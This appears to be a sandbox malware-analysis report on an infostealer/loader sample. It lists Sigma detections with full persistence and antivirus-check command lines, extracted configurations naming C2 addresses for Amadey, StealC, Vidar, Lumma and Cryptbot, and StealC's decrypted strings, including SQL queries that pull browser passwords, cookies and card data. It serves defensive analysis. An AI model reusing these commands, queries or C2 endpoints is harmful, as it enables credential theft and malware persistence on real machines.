Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3576, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F, ProcessId: 4764, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", ProcessId: 5832, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1001588001\efbc18aa93.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ProcessId: 7060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\efbc18aa93.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Jurisdiction.pif T, CommandLine: Jurisdiction.pif T, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1100, ParentProcessName: cmd.exe, ProcessCommandLine: Jurisdiction.pif T, ProcessId: 4084, ProcessName: Jurisdiction.pif

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ProcessId: 4084, TargetFilename: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe, ParentProcessId: 5732, ParentProcessName: splwow64.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ProcessId: 1100, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif, ProcessId: 4084, TargetFilename: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js", ProcessId: 5832, ProcessName: wscript.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1268, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6340, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1100, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 5828, ProcessName: findstr.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: 00000003.00000002.2126506859.00000000009D1000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 7.2.stealc_default2.exe.690000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
Source: 7.2.stealc_default2.exe.690000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.17/2fb6c2cc8dce150a.php", "Botnet": "default_valenciga"}
Source: 43.0.RDX123456.exe.700000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["contemteny.site", "faulteyotk.site", "authorisev.site", "dilemmadu.site", "goalyfeastz.site", "opposezmny.site", "seallysl.site", "computeryrati.site", "servicedny.site"], "Build id": "4SD0y4--RLREBORN"}
Source: blurayplayer32.exe.2824.39.memstrmin	Malware Configuration Extractor: Socks5Systemz {"C2 list": ["csenhav.net"]}
Source: JavUmar.exe.4712.31.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["home.sevjoi17vt.top", "sevjoi17vt.top", "0/80/home.sevjoi17vt.top", "QUERY\|rd\|A\|IN\|home.sevjoi17vt.top", ".1.1home.sevjoi17vt.top", "0/80/sevjoi17vt.top", "QUERY\|rd\|AAAA\|IN\|home.sevjoi17vt.top", "%gPsevjoi17vt.top"]}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\DZ Blu-ray player 11.1.45\DZ Blu-ray player 11.1.45.exe	ReversingLabs: Detection: 45%
Source: C:\ProgramData\LgAmARwZ\Application.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\stail[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD1234[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Offnewhere[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\JavUmar[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\RDX123456[1].exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\new_v8[1].exe	ReversingLabs: Detection: 79%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 47%
Source: file.exe	Virustotal: Detection: 44%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\LgAmARwZ\Application.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: 01
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: 03
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: 20
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: 25
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetProcAddress
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: LoadLibraryA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: lstrcatA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: OpenEventA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CreateEventA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CloseHandle
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Sleep
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: VirtualFree
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetSystemInfo
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: VirtualAlloc
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: HeapAlloc
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetComputerNameA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: lstrcpyA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetProcessHeap
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetCurrentProcess
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: lstrlenA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: ExitProcess
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetSystemTime
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: advapi32.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: gdi32.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: user32.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: crypt32.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: ntdll.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetUserNameA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CreateDCA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetDeviceCaps
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: ReleaseDC
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: sscanf
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: VMwareVMware
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: HAL9TH
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: JohnDoe
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: DISPLAY
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: http://185.215.113.17
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: 00x00
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: !\|
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: /2fb6c2cc8dce150a.php
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: /f1ddeb6592c03206/
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: default_valenciga
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetFileAttributesA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GlobalLock
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: HeapFree
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetFileSize
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GlobalSize
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: IsWow64Process
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Process32Next
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetLocalTime
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: FreeLibrary
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetVolumeInformationA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Process32First
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetLocaleInfoA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetModuleFileNameA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: DeleteFileA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: FindNextFileA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: LocalFree
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: FindClose
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: LocalAlloc
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetFileSizeEx
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: ReadFile
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SetFilePointer
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: WriteFile
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CreateFileA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: FindFirstFileA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CopyFileA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: VirtualProtect
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetLastError
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: lstrcpynA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: MultiByteToWideChar
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GlobalFree
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: WideCharToMultiByte
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GlobalAlloc
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: OpenProcess
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: TerminateProcess
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetCurrentProcessId
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: gdiplus.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: ole32.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: bcrypt.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: wininet.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: shlwapi.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: shell32.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: psapi.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: rstrtmgr.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SelectObject
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: BitBlt
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: DeleteObject
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CreateCompatibleDC
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GdiplusStartup
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GdiplusShutdown
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GdipDisposeImage
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GdipFree
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CoUninitialize
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CoInitialize
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CoCreateInstance
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: BCryptDecrypt
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: BCryptSetProperty
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: BCryptDestroyKey
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetWindowRect
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetDesktopWindow
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetDC
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CloseWindow
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: wsprintfA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CharToOemW
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: wsprintfW
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: RegQueryValueExA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: RegEnumKeyExA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: RegOpenKeyExA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: RegCloseKey
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: RegEnumValueA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CryptUnprotectData
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SHGetFolderPathA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: ShellExecuteExA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: InternetOpenUrlA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: InternetConnectA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: InternetCloseHandle
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: InternetOpenA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: HttpSendRequestA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: HttpOpenRequestA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: InternetReadFile
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: InternetCrackUrlA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: StrCmpCA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: StrStrA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: StrCmpCW
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: PathMatchSpecA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: RmStartSession
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: RmRegisterResources
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: RmGetList
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: RmEndSession
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: sqlite3_open
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: sqlite3_step
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: sqlite3_column_text
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: sqlite3_finalize
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: sqlite3_close
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: sqlite3_column_blob
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: encrypted_key
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: PATH
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: NSS_Init
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: NSS_Shutdown
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: PK11_FreeSlot
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: PK11_Authenticate
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: C:\ProgramData\
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: browser:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: profile:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: url:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: login:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: password:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Opera
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: OperaGX
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Network
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: cookies
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: .txt
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: TRUE
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: FALSE
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: autofill
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: history
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: cc
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: name:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: month:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: year:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: card:
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Cookies
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Login Data
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Web Data
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: History
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: logins.json
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: formSubmitURL
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: usernameField
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: encryptedUsername
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: encryptedPassword
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: guid
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: cookies.sqlite
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: formhistory.sqlite
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: places.sqlite
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: plugins
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Local Extension Settings
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Sync Extension Settings
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: IndexedDB
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Opera Stable
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Opera GX Stable
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: CURRENT
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: chrome-extension_
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: Local State
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: profiles.ini
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: chrome
Source: 7.2.stealc_default2.exe.690000.0.unpack	String decryptor: opera
